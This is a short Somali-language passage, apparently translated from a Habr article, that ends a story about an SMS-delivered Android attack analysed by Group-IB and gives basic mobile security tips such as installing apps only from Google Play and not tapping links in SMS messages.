    Nasiib wanaag, qofka helay fariinta SMS-ka ee lagu tilmaamay bilowga maqaalku wuxuu noqday khabiir ku takhasusay amniga internetka. Sidaa darteed, nooca dhabta ah, nooca aan agaasimaha ahayn wuxuu ka duwan yahay kii hore loo sheegay: qofku wuxuu helay SMS xiiso leh, ka dib markii uu siiyay kooxda Sirdoonka Kooxda Khatarta ah ee Kooxda-IB. Natiijada weerarka waa qodobkan. Dhammaad wanaagsan, sax? Si kastaba ha ahaatee, dhammaan sheekooyinka si fiican uma dhammaan, iyo si taadu aysan u ekaan in la gooyo agaasimaha oo lacag la'aan ah, inta badan waxay ku filan tahay inaad raacdo xeerarka soo socda ee muddada dheer:

    • Ha ku rakibin apps-ka aaladdaada moobilka Android meel kasta oo aan Google Play ahayn
    • markaad rakibayso codsiga, fiiro gaar ah u yeelo xuquuqda uu codsado codsiga
    • fiiro gaar ah u yeelo kordhinta faylasha la soo galiyay
    • si joogto ah u rakib Android OS updates
    • Ha booqan ilaha laga shakiyo hana ka soo dejin faylasha halkaas
    • Ha gujin xiriiriyeyaasha lagu helo fariimaha SMS-ka.

Source: www.habr.com

Add a comment